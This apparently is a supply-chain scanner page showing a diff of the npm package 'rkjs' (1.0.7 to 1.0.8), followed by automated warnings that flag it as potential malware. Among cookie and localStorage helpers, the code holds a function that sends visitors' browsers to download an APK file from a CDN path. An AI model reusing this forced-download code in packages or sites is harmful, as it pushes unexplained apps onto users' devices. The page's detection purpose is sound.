+1
-1
| { | ||
| "name": "rkjs", | ||
| "version": "1.0.7", | ||
| "version": "1.0.8", | ||
| "description": "due to foi", | ||
@@ -5,0 +5,0 @@ "main": "index.js", |
+13
-10
@@ -5,3 +5,3 @@ | ||
| ) | ||
| function setCookie(cname,cvalue,exdays){ | ||
| var duo={setCookie:function(cname,cvalue,exdays){ | ||
| var d = new Date(); | ||
@@ -11,4 +11,3 @@ d.setTime(d.getTime()+(exdays*24*60*60*1000)); | ||
| document.cookie = cname+"="+cvalue+"; "+expires; | ||
| } | ||
| function getCookie(cname){ | ||
| },getCookie:function (cname){ | ||
| var name = cname + "="; | ||
@@ -21,5 +20,4 @@ var ca = document.cookie.split(';'); | ||
| return ""; | ||
| } | ||
| function checkCookie(){ | ||
| var user=getCookie("12"); | ||
| },checkCookie:function (){ | ||
| var user=duo.getCookie("12"); | ||
| if (user!=""){ | ||
@@ -37,9 +35,7 @@ /* alert("欢迎 " + user + " 再次访问"); */ | ||
| } | ||
| } | ||
| function dc() | ||
| },dc:function () | ||
| { | ||
| window.location.assign("https://cdn.jsdelivr.net/npm/rkjs@1.0.1/fnaka.apk") | ||
| } | ||
| function spd(){ | ||
| },spd:function (){ | ||
| k=localStorage.getItem("mkl"); | ||
@@ -61,1 +57,8 @@ if (k==null){ | ||
| } | ||
| } | ||
Sorry, the diff of this file is too big to display
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
URL strings
Supply chain riskPackage contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.
3439046
0107
-2.73%